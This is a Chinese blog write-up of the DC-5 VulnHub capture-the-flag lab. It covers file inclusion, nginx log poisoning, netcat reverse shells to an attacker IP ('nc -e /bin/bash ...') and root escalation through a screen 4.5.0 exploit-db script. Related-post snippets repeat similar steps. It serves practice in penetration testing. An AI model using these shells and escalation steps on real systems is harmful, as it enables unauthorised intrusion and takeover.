入侵靶机DC-5

最新推荐文章于 2024-04-20 17:38:48 发布

火中的冰~

最新推荐文章于 2024-04-20 17:38:48 发布

阅读量429

点赞数

分类专栏：渗透测试 DC-1-9通关秘籍

本文链接：https://blog.youkuaiyun.com/qq_42094992/article/details/108919939

版权

渗透测试同时被 2 个专栏收录

52 篇文章

订阅专栏

DC-1-9通关秘籍

10 篇文章

订阅专栏

1.主机扫描

通过已知MAC地址，确定DC-5的ip。

2.端口扫描

确定靶机开放端口

3.访问web界面

提交表单发现时间在变化

直接访问thankyou.php文件

这里可能存在文件包含

4.web目录扫描

footer.php与刚才页面下面显示的时间相对应，所以可能是被包含文件。

5.contact.php处 Bp抓包测试文件包含

文件包含成功

6.利用nginx日志写shell

菜刀连接

nginx日志路径 /var/log/nginx/access.log

连接符连接命令，文件包含调用/bin/bash解释器执行

nc 192.168.43.193 8888 -c /bin/bash

菜刀虚拟终端反弹shell

nc -e /bin/bash 192.168.43.193 6699

nc -lvvp 6699 监听

7.提权

启动交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

find命令搜索带有suid权限的命令

find / -perm -u=s -type f 2>/dev/null

发现特殊文件screen 4.5.0

搜索已知漏洞

 searchsport screen 4.5.0

cp /usr/share/exploitdb/exploits/linux/local/41154.sh ~/Desktop/41154.sh

cp /usr/share/exploitdb/exploits/linux/local/41154.sh ~/Desktop/41152.txt

41154.sh这个脚本不能直接执行，所以需要以下步骤

剪切这两段代码到新文件

执行这两个文件

执行

set ff=unix  使windows的代码可以在unix上运行

并将其他剩余代码剪切到dc5.sh

脚本上传tmp目录

运行dc5.sh

chmod +x dc5.sh

./dc5.sh

8.查看flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

火中的冰~

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

DC5-靶机

08-29

2267

下载地址作者已经做了一个提示视频，地址配置的环境： kali：192.168.25.131 DC5-靶机和 kali 在同一C段渗透 nmap扫描网段，发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.135，判定为DC3-靶机，继续使用nmap获取详细信息 nmap -A -p 1...

入侵靶机DC-9

干铮的博客

11-11

574

1.主机发现 Nmap -sP 192.168.43.0/24 C:\Users\ASUS>Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.79 Host is up (0.0010s latency). MAC Address: 00:0C:29:B7:B6:AD (VMware).

参与评论您还未登录，请先登录后发表或查看评论

DC-5靶机

m0_62094846的博客

07-01

418

ifconfig查找主机IP扫一波内网，探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.133 -p- -oN nmap133.A(中途IP改成了192.168.61.134)开放了80，111，39542打开显示的IP地址在concat界面把信息填写，就会跳转页面，是GET传参反复刷新会发现时间有变化，猜测页面存在文件包含（?）然后用burp爆破页面（御剑扫不出来）一共7个 footer可以看到这个，确认这

渗透测试学习之靶机DC-5

xdbzdgx的博客

11-18

6070

1.下载靶机本篇文章是DC靶机系列的第五篇，针对的是靶机DC-5，建议感兴趣的读者从DC-1开始练习，详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件，该格式可直接在VMware上打开，如果显示打开失败，点击重试即可成功，如果仍无法成功可百度、谷歌解决。同样地，DC-5只有一个flag。在VMware加载成功之后显示如下界面：默认状态我们是打不开该系统的，也不知道账号密码的，毕竟我们的目的就是在不知道账号密码的情况下拿到roo.

靶机实战-DC-5

滕财然的博客

02-27

408

DC-5靶机实战文章目录DC-5靶机实战1、主机发现2、端口及端口详细信息扫描3、访问80端口(http服务)4、提权 1、主机发现目标IP：192.168.232.169 arp-scan 优点是速度快，但不能跨网段 2、端口及端口详细信息扫描 3、访问80端口(http服务) 只发现Contact页面，有一个留言板块用AWVS扫一下：发现其它目录，访问扫出来的目录：发现...

Vulnhub靶机渗透测试——DC-5

Cobra的博客

05-11

1091

一、实验环境攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.184 靶机下载地址：二、信息收集 1、使用nmap进行存活主机探测 nmap 192.168.189.0/24 2、发现IP192.168.189.184开放80,111端口，再次使用nmap对其进行扫描 nmap 192.168.189.184 -sV -T4 -A -p- 3、访问其80端口 4、浏览页面并没有发现可以进行漏洞利用的地方，使用

入侵靶机DC-8

干铮的博客

10-15

2127

DC-8 1.主机发现使用Nmap进行ping扫描，根据已知mac地址获取ip地址。 Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.1 Host is up (0.0049s latency). MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communi

Vulnhub靶机 DC-6 打靶实战详细渗透测试过程

网络空间安全学习

04-20

2109

查看sudo -l 下的内容，发现有jens用户权限执行的脚本，正是刚才我们刚才看见的shell脚本，接下来可以利用此，来反弹jens用户权限的shell。当前目录下无可利用的文件信息，查看家目录，发现有四个用户信息，逐一查看，发现在jens家目录和mark家目录下有文件信息，逐一查看。mark家目录下有一个文件夹，文件夹当中为一个txt文本文件，查看后发现graham用户的信息，尝试ssh远程登录到graham。发现可以正常的命令回显，那么接下来直接进行反弹shell，kali端开启监听。

对DC-6靶机进行渗透测试

zll___的博客

03-20

1046

对DC-6靶机进行渗透测试

（VulnHub靶机通关）DC-9

yang1234567898的博客

01-23

902

靶机下载地址：https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP：192.168.43.192 80端口为开放状态，22端口是filtered状态 web渗透访问80端口的web服务，打开Search界面，输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt，然后用sqlmap进行爆破爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.

DC-5 靶机实战

PigLL的博客

08-22

781

DC-5 靶机实战实验环境：靶机：DC-5 攻击机：kali 使kali和DC-5在同一网段，都在NAT模式下 1.信息收集：首先确定kali的IP 扫描同网段存活的主机因为kali的IP为192.168.137.136 所以确定DC-5靶机的IP为192.168.137.143 对DC-5进行端口扫描 ...

067 渗透测试实战，靶机 DC-5

鸡蛋炒鸡蛋

05-27

1563

文章目录一：环境准备二：nmap扫描三：御剑扫描网站一：环境准备下载：点我下载之后完成安装，过程详情请参考，063 渗透测试实战，靶机 DC-1 需要抓包软件bp，文件的下载安装可以参考我的前面的内容：047 Burp Suite的详细安装与使用打开DC-5，建议把虚拟机升级到15.5.7，我之前的虚拟机做这个dc靶机实验的时候经常电脑蓝屏。二：nmap扫描扫描局域网主机号 nmap -sP 192.168.100.0/24 -oN nmap.sP 扫描端口号 nmap

入侵靶机DC-7

干铮的博客

10-08

1519

DC-7 1.主机发现靶机开机后DHCP获取有ip地址 2.信息收集端口扫描 C:\Users\ASUS>Nmap 192.168.43.111 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-08 08:29 ?D1ú±ê×?ê±?? Nmap scan report for dc-7 (192.168.43.111) Host is up (0.00030s latency). Not s

DC-5

per_se_veran_ce的博客

10-07

499

1、发现目标主机，信息收集开放端口80，111，59888 2、访问80端口尝试提交留言刷新一次年份变化一次 http://192.168.168.203/thankyou.php?firstname=1&lastname=1&country=australia&subject=1 3、御剑扫描敏感目录 4、逐步去试，发现footer.php...

入侵靶机DC-1

干铮的博客

08-13

401

1.主机发现 namp -sP 10.3.139.0/24 2.指纹收集 whatweb 10.3.139.96 3.目录爆破 4.根据版本查询相应漏洞根据版本可查出Drupa7.x存在远程代码执行漏洞 5.使用msf进行漏洞利用 DC-1一共有5个flag flag3需要登录数据库查找 python -c 'import pty;pty.spawn("/bin/bash")' ...

Vulnhub-DC-5靶机实战

御七彩虹猫

05-18

956

Vulnhub-DC-5靶机实战

DC系列5靶机实战

qq_43462485的博客

10-28

747

DC-5靶机实战攻击机：kali 192.168.43.16 目标机：dc-5 192.168.43.251 一、信息收集 1.使用kali自带的arp-scan -l进行同网段主机发现，然后使用nmap进行端口扫描 2.发现开放80端口的web服务，溜了一圈没找到什么信息，还是参考了一下大佬的思路发现提交contact信息后每次刷新thank you的界面下面的数值都会变化，第一次遇到这种类型参考大佬后发现可能是LFI（本地文件包含）漏洞 3.通过burp抓包，对参数进行

DC-5靶机渗透测试（文件包含漏洞）

single_g_l的博客

03-26

9449

一、环境靶机： 192.168.1.127 攻击机：192.168.1.209 二、信息收集 1、主机发现&端口扫描 nmap -sP 192.168.1.0/24 #发现存活主机 nmap -sS A 192.168.1.127 #开放端口 2、访问80端口 3、尝试提交留言，刷新页面，“Copyright © 2017”动态变化刷新页面，“Copyright © 2017”动态变化 4、dirsearch 扫描敏感目录 dirsearch .

oscp——DC-5

王嘟嘟的博客

02-08

391

0x00 前言这个是第二十五台机子了，还是没有做出来，不过学到了新的东西 0x01 信息收集 1.ip 2.端口 0x02 Web 这里直接访问，发现是一个介绍内容跑一下目录发现footer.php和thankyou.php访问 thankyou.php footer.php 这里看了大佬的wp才知道可能有EIF http://192.168.0.149/thankyou.php...

DC9靶机渗透测试验收记录